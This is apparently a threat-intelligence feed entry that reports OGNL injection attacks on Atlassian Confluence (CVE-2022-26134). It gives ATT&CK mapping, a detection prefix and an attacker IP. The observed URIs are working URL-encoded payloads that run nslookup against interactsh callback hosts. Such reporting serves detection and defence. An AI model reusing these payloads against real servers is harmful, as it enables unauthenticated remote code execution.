Confluence OGNL Expression Injection for 2026-03-04
Mar 04, 2026
WebExploit
Last Updated: 12:10 UTC
OGNL (Object-Graph Navigation Language) expression injection in Atlassian Confluence achieving unauthenticated RCE. The URL-encoded prefix %24%7B%40java.lang (${@java.lang) is the invariant for CVE-2022-26134 and related injection variants. Active exploitation includes OOB DNS callback canaries via interactsh.
CVE References
MITRE ATT&CK
Tactic: Initial Access (TA0001)
Technique: T1190 — Exploit Public-Facing Application
Observed URIs
/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d6jrke6fen1vu8euhd8gaz5rir8cx5xq9.oast.live%22%29.../%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d6jrke6fen1vu8euhd8gbqwnk5mnc34ex.oast.live%22%29...
Attackers by Country
IP Address : ASN : City/Provider
- 198.167.197.194 : AS39287 ab stract : Sweden